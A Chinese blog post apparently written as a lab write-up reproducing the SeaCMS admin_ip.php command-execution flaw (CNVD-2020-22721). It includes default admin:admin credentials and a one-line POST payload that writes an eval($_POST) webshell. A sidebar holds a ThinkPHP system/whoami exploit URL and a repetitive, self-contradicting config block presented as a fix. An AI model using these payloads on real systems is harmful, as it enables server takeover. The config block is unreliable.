【漏洞复现-seaCms-命令执行】vulfocus/seacms-cnvd_2020_22721

已于 2023-01-06 14:43:12 修改
阅读量1.6k 收藏 12
点赞数 3
分类专栏: 0X06【漏洞复现】 文章标签: web安全
于 2022-10-15 11:07:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53079406/article/details/127329791
版权

  

前言:

介绍: 

博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章)。

殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edusrc高白帽,vulfocus、攻防世界等平台排名100+、高校漏洞证书、cnvd原创漏洞证书等。

擅长:对于技术、工具、漏洞原理、黑产打击的研究。

C站缘:C站的前辈,引领我度过了一个又一个技术的瓶颈期、迷茫期。

导读:

面向读者:对于网络安全方面的学者。 

本文知识点(读者自测): 

(1)写入可执行文件(√)

 让读者如虎添翼

命令、代码执行博文目标状态
【漏洞复现-jupyter_notebook-命令执行】vulfocus/jupyter_notebook-cve_2019_9644发现功能点上的命令执行已发布
【漏洞复现-solr-命令执行】vulfocus/solr-cve_2019_17558寻找模板(接口、配置文件)的命令执行漏洞已发布
【漏洞复现-seaCms-命令执行】vulfocus/seacms-cnvd_2020_22721写入可执行文件已发布
【漏洞复现-maccms-命令执行】vulfocus/maccms-cve_2017_17733参数中写入命令(加密)已发布
【漏洞复现-webmin-命令执行】vulfocus/webmin-cve_2019_15107拼接执行命令已发布
【漏洞复现-thinkphp-命令执行】vulfocus/thinkphp-3.2.x写入错误日志中已发布
【漏洞复现-Discuz-代码执行】Discuz_CVE-2019-13956cookie中植入已发布
【漏洞复现-骑士cms-代码执行】vulfocus/骑士cms_cve_2020_35339后台配置中植入命令已发布
更多复现漏洞将公布,敬请期待————

目录

一、靶场环境

1.1、平台:

1.2、知识:

1.3、描述:

二、漏洞验证

2.1、分析:

2.4、解题:

一、靶场环境

1.1、平台:

Vulfocus 漏洞威胁分析平台

123.58.224.8:31853

123.58.224.8:8589

 123.58.224.8:8589

1.2、知识:

1、审计

寻找用户可控参数,且存在对用户输入没有或处理不完全情况,直接写入文件,攻击者可利用该漏洞执行恶意代码,获取服务器权限

2、环境

将php后门代码写入到是php的文件里面,然后再连接该php文件

1.3、描述:

在w1aqhp/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,直接写入文件。攻击者可利用该漏洞执行恶意代码,获取服务器权限

二、漏洞验证

2.1、分析:

题目提示:

后台路径:/manager 后台密码:admin:admin

点击系统---->后台ip安全设置

点击确认,并抓包

v=0&ip=+11111111111";eval($_POST[1]);//

 POST提交的数据中写入后门连接代码

 回显正常

访问写入的页面

http://123.58.224.8:44871/manager/admin_ip.php

(也回显正常)

 后门连接

http://123.58.224.8:44871/manager/admin_ip.php

 

2.4、解题:

网络安全三年之约

First year 

掌握各种原理、不断打新的靶场

目标:edusrc、cnvd 

主页 | 教育漏洞报告平台 (sjtu.edu.cn)https://src.sjtu.edu.cn/https://www.cnvd.org.cnhttps://www.cnvd.org.cn/

second year 

不断学习、提升技术运用技巧,研究各种新平台

开始建立自己的渗透体系

目标:众测平台、企业src应急响应中心 

众测平台URL
漏洞盒子漏洞盒子 | 互联网安全测试众测平台
火线安全平台火线安全平台
漏洞银行BUGBANK 官方网站 | 领先的网络安全漏洞发现品牌 | 开放安全的提出者与倡导者 | 创新的漏洞发现平台
360漏洞众包响应平台360漏洞云漏洞众包响应平台
补天平台(奇安信)补天 - 企业和白帽子共赢的漏洞响应平台,帮助企业建立SRC
春秋云测首页
雷神众测(可信众测,安恒)雷神众测 - BountyTeam
云众可信(启明星辰)云众可信 - 互联网安全服务引领者
ALLSECALLSEC
360众测360众测平台
看雪众测(物联网)https://ce.kanxue.com/
CNVD众测平台网络安全众测平台
工控互联网安全测试平台CNCERT工业互联网安全测试平台
慢雾(区块链)Submit Bug Bounty - SlowMist Zone - Blockchain Ecosystem Security Zone
平安汇聚http://isrc.pingan.com/homePage/index

互联网大厂URL
阿里https://asrc.alibaba.com/#/
腾讯https://security.tencent.com/
百度https://bsrc.baidu.com/v2/#/home
美团https://security.meituan.com/#/home
360https://security.360.cn/
网易https://aq.163.com/
字节跳动https://security.bytedance.com/
京东https://security.jd.com/#/
新浪http://sec.sina.com.cn/
微博https://wsrc.weibo.com/
搜狗http://sec.sogou.com/
金山办公https://security.wps.cn/
有赞https://src.youzan.com/

Third Year 

学习最新的知识,建全自己的渗透体系

目标:参与护网(每一个男孩子心中的梦想) 

时间:一般5月面试,6/7月开始(持续2-3周)

分类:国家级护网、省级护网、市级护网、重大节日护网(如:建党、冬奥等)

黑色地带(崛起)
关注
  • 3
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
海洋CMS /js/player/dmplayer/dmku/ SQL注入漏洞复现(CVE-2024-29275)
0xSec
06-12 606
海洋CMS影视管理系统 /js/player/dmplayer/dmku/ 接口存在SQL注入漏洞,未经授权攻击者可通过该漏洞获取数据库敏感信息,进一步利用可获取服务器权限,导致网站处于极度不安全状态。
CNVD-2020-22721seaCms命令执行漏洞
qq_46487664的博客
07-27 155
SeaCMS v12.9存在命令执行漏洞,在manager/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,直接写入文件。攻击者可利用该漏洞执行恶意代码,获取服务器权限。
主机渗透——CRC_3_PENTEST_2_WORDPRESS
B_roin的博客
02-15 1267
1. 该题使用的是wordpress框架,可以利用WPScan进行扫描 注意:带着token才能扫描出漏洞 WPScan的使用教程可以参考:https://blog.csdn.net/guo15890025019/article/details/118548932 在这里利用mailpress插件的命令执行漏洞,越权执行命令 2. 利用漏洞 http:// IP地址 /wp-content/plugins/mailpress/mp-includes/action.php 利用hackbar或者burp su
熊海CMS_V1.0代码审计与漏洞分析及采坑日记(一)--文件包含漏洞
qq_28624871的博客
03-13 5994
熊海CMS_V1.0代码审计与漏洞分析及采坑日记(一)–文件包含漏洞 前言 最近几天在给协会的学弟讲代码审计入门相关内容,便找了这个熊海CMS_V1.0来教学,结果在这个过程中遇到蛮多问题的,于是这篇文章详细记录了对熊海CMS_V1.0从搭建到审计与漏洞分析的过程,其中踩了很多坑,这些坑网上也没有什么记录,也是我之前学习过程中没有去仔细发现和研究的,果然古人诚不欺我,温故而知新,通过给学弟们讲这个简单的代码审计又学习到了很多新的内容,也欢迎阅读这篇文章的师傅们对文章出现的问题一起探讨交流,不足的地方也请多多
seacms 远程命令执行CNVD-2020-22721漏洞复现
weixin_42675091的博客
09-06 1200
seacms 远程命令执行CNVD-2020-22721漏洞复现
如何重设逐浪CMS后台管理目录-找不到后台登陆怎么办
zoomla188的博客
03-02 1055
建网站,用逐浪。 逐浪CMS后台强大,可以自由定制管理目录,而不需要有对应的物理目录,从而提升安全。 如下图所示,用户可以自由定义网站后台管理目录: 有管理员反馈,如果忘记了后台密码怎么办? 方法1:找一个默认的初始逐浪源码包,将config/site.config覆盖到相同文件,从而恢复管理目录。 缺点:如果没有备份site.config中的其它信息,会丢失网站名、
74CMS_6.0.48_远程命令执行_CNVD-2021-45280
02-22
本文为 漏洞编号 CNVD-2021-45280 ,即 74CMS 远程命令执行漏洞利用工具源码内容 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 更...
Apache Tomcat 文件包含漏洞CNVD-2020-10487,对应 CVE-2020-1938)
03-05
CNVD-2020-10487 和 CVE-2020-1938 是同一个安全漏洞的不同命名,这个漏洞被称为“Apache Tomcat 文件包含漏洞”。此漏洞的存在使得攻击者有可能通过精心构造的请求,将恶意代码注入到Tomcat服务器上,从而执行任意...
CNVD-2020-10487-Tomcat-Ajp-lfi_exp_
09-29
CNVD-2020-10487-Tomcat-Ajp-lfi
向日葵RCE漏洞CNVD-2022-10270)检测工具
02-19
向日葵RCE漏洞CNVD-2022-10270)检测工具,已经编译好,命令行运行即可 xrkrce.exe -h 127.0.0.1
weblogic_rce:cve2019_2725,CNVD-C-2019-48814 Weblogic _async远程命令执行exp
03-15
CNVD-C-2019-48814,CVE-2019-2725 Weblogic _async远程命令执行exp 主要代码基于js实现。 Linux Payload使用Jason,Windows Payload修改为10271,执行java.lang.Runtime。 环境需求 Windows的所有版本。 用法 cve...
Seacms代码审计小结(后台多处getshell)1
08-03
在框架中,有很多是写的是以 txt 结尾的件,这种直接读是法以 php 来解析,但是如果找到处件包含的漏洞,让他包含的是这种我们可以修改的件,那就也可以造成代码
seacms海洋cms影视管理系统 v9.1.zip
07-07
seacms海洋cms影视管理系统 v9.1 更新日志 更新日期:2019年2月1日 v9.1 优化:服务器开启OPcache时后台设置兼容性 优化:视频编辑时剧情分类显示方式 优化:剧情分类缓存项 seacms海洋影视管理系统简介 海洋影视管理系统(seacms,海洋cms)是一套专为不同需求的站长而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选,只需5分钟即可建立一个海量的视频讯息的行业网站。 海洋cms采用PHP MYSQL架构,原生PHP代码带来卓越的访问速度和负载能力免去您的后顾之优。海洋cms支持一键转换原max的模板和数据,实现网站无缝迁移到新平台。众多人性化功能设计,超前定时执行任务,让您处理数据得心应手,您只需要专心做内容运营,其它的交给我们。 为符合SEO要求开发大量功能,比如百度结构化数据生成,搜索引擎地图等。全新设计的专题管理,同时支持按分类 扩展分类 剧情分类三种分类模式组合,让网站内容与众不同。简单易用丰富的模板标签,方便网站模板设计制作,让网站更显专业。 海洋cms是基于PHP MySql技术开发的开源CMS,完全开源 、没有任何加密代码,强劲功能、卓越性能、安全健壮。超级易用、模板众多、插件齐全、资源丰富。构架稳健,平滑升级。 seacms海洋影视管理系统前台页面 seacms海洋影视管理系统后台管理 后台路径:域名//admin 用户名与密码:admin(安装时可设置) 后台页面:  相关阅读 同类推荐:站长常用源码
Seacms漏洞
Grey的博客
07-10 5026
海洋CMS6.45前台getshell漏洞复现结果:http://127.0.0.1/CMS/seacms_v6.4/upload/search.phppost:searchtype=5&order=}{end if} {if:1)phpinfo();if(1}{end if}1.漏洞的触发点是在search.php 中的echoSearchPage()函数可以触发漏洞。常规的分析都是先找...
Tomcat后台管理漏洞复现(弱口令+上传webshell)
weixin_51198941的博客
09-08 1438
Tomcat有一个管理后台,其用户名和密码在Tomcat安装目录下的conf omcat-users.xml文件中配置,不少管理员为了方便,经常采用弱口令。Tomcat 支持在后台部署war包,可以直接将webshell部署到web目录下,如果tomcat后台管理用户存在弱口令,这很容易被利用上传webshell。在可见,用户tomcat拥有上述所有权限,密码是tomcat。正常安装的情况下,tomcat8中默认没有任何用户,且manager页面只允许本地IP访问。
【中间件漏洞】Apache HTTPD 漏洞全集复现(基于Vulhub平台)
最新发布
Continuejww的博客
09-11 793
①CVE-2017-15715 ②多后缀解析漏洞 ③远程命令执行漏洞 ④CVE-2021-41773 ⑤CVE-2021-42013 ⑥CVE-2021-40438
junams 文件上传 (CNVD-2020-24741)
小小猪的博客
12-30 1930
junams 文件上传 (CNVD-2020-24741) 漏洞简介: JunAMS是一款以ThinkPHP为框架的开源内容管理系统。 JunAMS内容管理系统存在文件上传漏洞,攻击者可利用该漏洞上传webshell,获取服务器权限。 影响版本: JunAMS v1.2.1.20190403 环境搭建: 在线环境 地址 漏洞复现: 访问后台 账号admin密码admin 点击系统设置->版本设置->图片上传 burp进行抓包,可以看到有上传功能 分析common...
漏洞复现之YApi接口管理平台远程代码执行
白帽子九一
05-31 1086
1. 简介 YAPI是由去哪儿网移动架构组(简称YMFE,一群由FE、iOS和Android工程师共同组成的最具想象力、创造力和影响力的大前端团队)开发的可视化接口管理工具,是一个可本地部署的、打通前后端及QA的接口管理平台。YAPI旨在为开发、产品和测试人员提供更优雅的接口管理服务,可以帮助开发者轻松创建、发布和维护不同项目,不同平台的API。有了YAPI,我们可以很方便的测试、管理和维护多个项目的API接口,不像Swagger那样是随应用生和灭的(且线上环境下大多数须关闭),YAPI是一个独立的服务平台
CNVD-C-2020-121325:禅道文件上传漏洞通告
爱国小白帽
10-27 2117
原创 360CERT [三六零CERT](javascript:void(0)???? 今天 报告编号:B6-2020-102602 报告来源:360CERT 报告作者:360CERT 更新日期:2020-10-26 0x01 漏洞简述 2020年10月26日,360CERT监测发现 禅道官方 发布了 文件上传漏洞 的风险通告,该漏洞编号为 CNVD-C-2020-121325 ,漏洞等级:高危,漏洞评分:7.2。 恶意攻击者可以读取或上传任意文件,成功利用漏洞可以读取目标系统敏感文件以及获得系统管理权限
vulfocus thinkphp 代码执行 (CNVD-2018-24942)
03-29
漏洞描述: ThinkPHP是一款快速、简单的PHP开发框架,该框架在处理某些特定情况下的输入时存在代码执行漏洞。攻击者可以通过构造恶意的输入数据,利用该漏洞执行任意代码,从而控制服务器。 漏洞影响: ThinkPHP 5.0.x - 5.0.18 版本 ThinkPHP 5.1.x - 5.1.0-beta.5 版本 漏洞利用: 攻击者可以通过在URL中添加参数,或者在POST请求中添加参数,来触发该漏洞。下面是一个简单的例子: http://example.com/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami 漏洞修复: 1.升级到最新版本的ThinkPHP 2.禁用动态调用方法 在config.php文件中添加以下配置: 'APP_DEBUG' => false, 'APP_USE_NAMESPACE' => true, 'DEFAULT_FILTER' => 'htmlspecialchars', 'DEFAULT_CONTROLLER' => 'index', 'URL_CASE_INSENSITIVE' => true, 'URL_MODEL' => '2', 'URL_PATHINFO_DEPR' => '/', 'URL_ROUTER_ON' => true, 'URL_ROUTE_RULES' => array( ), 'DEFAULT_MODULE' => 'index', 'URL_HTML_SUFFIX' => '.html', 'APP_AUTOLOAD_PATH' => '@.TagLib', 'APP_AUTOLOAD_LAYER' => 'Controller,Model', 'APP_AUTOLOAD_PATH' => '@.TagLib', 'APP_AUTOLOAD_LAYER' => 'Controller,Model', 'DEFAULT_FILTER' => 'htmlspecialchars', 'DEFAULT_TIMEZONE' => 'Asia/Shanghai', 'TMPL_ACTION_ERROR' => APP_PATH . 'Tpl/error.tpl', 'TMPL_ACTION_SUCCESS' => APP_PATH . 'Tpl/success.tpl', 'DEFAULT_AJAX_RETURN' => 'JSON', 'TOKEN_ON' => true, 'TOKEN_NAME' => '__hash__', 'TOKEN_TYPE' => 'md5', 'TOKEN_RESET' => true, 'VAR_FILTERS' => 'htmlspecialchars', 'SESSION_AUTO_START' => true, 'DEFAULT_LANG' => 'zh-cn', 'APP_GROUP_LIST' => 'Home,Admin', 'APP_GROUP_MODE' => 1, 'APP_GROUP_PATH' => 'Modules', 'AUTOLOAD_PATH' => 'Think.Util', 'APP_TAGS_ON' => true, 'APP_SUB_DOMAIN_DEPLOY' => false, 'APP_SUB_DOMAIN_RULES' => array(), 'OUTPUT_ENCODE' => false, 'COOKIE_EXPIRE' => 0, 'COOKIE_DOMAIN' => '', 'COOKIE_PATH' => '/', 'COOKIE_PREFIX' => '', 'URL_PARAMS_BIND' => true, 'URL_404_REDIRECT' => '', 'DB_TYPE' => 'mysql', 'DB_HOST' => '127.0.0.1', 'DB_NAME' => 'thinkphp', 'DB_USER' => 'root', 'DB_PWD' => '', 'DB_PORT' => '3306', 'DB_PREFIX' => 'tp_', 'DB_FIELDTYPE_CHECK' => false, 'DB_FIELDS_CACHE' => true, 'DB_CHARSET' => 'utf8', 'DB_DEBUG' => true, 'DB_LITE' => false, 'DB_DEPLOY_TYPE' => 0, 'DB_RW_SEPARATE' => false, 'DB_MASTER_NUM' => 1, 'DB_SLAVE_NO' => '', 'DB_SQL_BUILD_CACHE' => false, 'DB_SQL_BUILD_LENGTH' => 20, 'TIME_ZONE' => 'PRC', 'SHOW_PAGE_TRACE' => false, 'LOG_RECORD' => true, 'LOG_TYPE' => 'File', 'LOG_LEVEL' => 'EMERG,ALERT,CRIT,ERR', 'LOG_FILE_SIZE' => 2097152, 'LOG_EXCEPTION_RECORD' => false, 'LOG_AUTO_RECORD' => true, 'SESSION_OPTIONS' => array(), 'SESSION_TYPE' => '', 'SESSION_PREFIX' => 'think', 'SESSION_EXPIRE' => 3600, 'SESSION_TABLE' => '', 'SESSION_COOKIE_NAME' => '', 'SESSION_AUTO_START' => true, 'SESSION_GC_DIVISOR' => 10000, 'SESSION_GC_MAXLIFETIME' => 1440, 'SESSION_DOMAIN' => '', 'SESSION_PATH' => '/', 'SESSION_SECURE' => false, 'SESSION_HTTPONLY' => true, 'VAR_SESSION_ID' => 'session_id', 'CACHE_TYPE' => 'File', 'CACHE_EXPIRE' => 0, 'CACHE_PREFIX' => '', 'CACHE_PATH' => TEMP_PATH, 'CACHE_FILE_SUFFIX' => '.php', 'CACHE_SERIALIZE' => true, 'CACHE_CHECK' => false, 'TMPL_CACHE_ON' => true, 'TMPL_CACHE_PREFIX' => '', 'TMPL_CACHE_TIME' => 0, 'TMPL_CACHE_PATH' => CACHE_PATH, 'TMPL_CACHE_FILE_SUFFIX' => '.php', 'TMPL_CACHE_FILE_EXT' => '.php', 'TMPL_CACHE_CHECK' => true, 'TMPL_EXCEPTION_FILE' => THINK_PATH . 'Tpl/think_exception.tpl', 'TMPL_ACTION_ERROR' => APP_PATH . 'Tpl/error.tpl', 'TMPL_ACTION_SUCCESS' => APP_PATH . 'Tpl/success.tpl', 'TMPL_DETECT_THEME' => false, 'TMPL_TEMPLATE_SUFFIX' => '.html', 'TMPL_ENGINE_TYPE' => 'Think', 'TMPL_CACHFILE_SUFFIX' => '.php', 'TMPL_DENY_FUNC_LIST' => 'echo,exit', 'TMPL_DENY_PHP' => false, 'TMPL_L_DELIM' => '{', 'TMPL_R_DELIM' => '}', 'TMPL_VAR_IDENTIFY' => 'array', 'TMPL_STRIP_SPACE' => true, 'TMPL_CACHE_ON' => false, 'TMPL_LAYOUT_ITEM' => '{__CONTENT__}', 'TMPL_CONTENT_TYPE' => 'text/html', 'TMPL_ACTION_ERROR' => APP_PATH . 'Tpl/error.tpl', 'TMPL_ACTION_SUCCESS' => APP_PATH . 'Tpl/success.tpl', 'LANG_SWITCH_ON' => false, 'LANG_AUTO_DETECT' => true, 'LANG_LIST' => 'zh-cn', 'VAR_LANGUAGE' => 'l', 'LANG_AUTO_REDIRECT' => false, 'TEMPLATE_CHARSET' => 'utf-8', 'COOKIE_HTTPONLY' => '', 'SECURE_FILTER' => '', 'CRYPT_TYPE' => 'Think', 'AUTH_KEY' => 'AuthKey', 'SECURITY_KEY' => 'SecurityKey', 'TOKEN_ON' => false, 'TOKEN_NAME' => '__hash__', 'TOKEN_TYPE' => 'md5', 'TOKEN_RESET' => true, 'TOKEN_CRYPT' => false, 'VAR_FILTERS' => '', 'DEFAULT_MODULE' => 'Home', 'DEFAULT_ACTION' => 'index', 'DEFAULT_THEME' => '', 'THEME_LIST' => '', 'THEME_DEFAULT' => '', 'THEME_ON' => false, 'THEME_FILE_SUFFIX' => '.html', 'THEME_TEMPLATE_SUFFIX' => '.html', 'THEME_TEMPLATE_PREFIX' => '', 'THEME_TEMPLATE_SUFFIX' => '.html', 'THEME_TEMPLATE_SEPARATOR' => '_',

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑色地带(崛起)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值